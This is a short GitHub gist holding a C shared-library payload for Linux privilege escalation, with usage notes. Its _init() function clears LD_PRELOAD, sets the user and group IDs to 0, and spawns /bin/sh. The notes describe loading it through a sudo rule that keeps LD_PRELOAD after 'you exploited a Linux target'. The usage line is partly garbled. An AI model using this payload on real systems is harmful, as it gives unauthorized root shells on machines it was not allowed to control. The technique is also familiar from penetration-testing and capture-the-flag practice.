Created
January 2, 2022 14:38
-
-
Save MoElaSec/ddd7df3805c86515a1baf7efe4289814 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <sys/types.h> | |
| #include <stdlib.h> | |
| void _init() { | |
| unsetenv("LD_PRELOAD"); | |
| setgid(0); | |
| setuid(0); | |
| system("/bin/sh"); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Privilege escalation
You exploited a Linux target but the user is not root however sudo -l shows LD_PRELOAD can execute ls (or whatever) as root without password.
save this script and use the command with it
ls shell.cmake sure to use the right user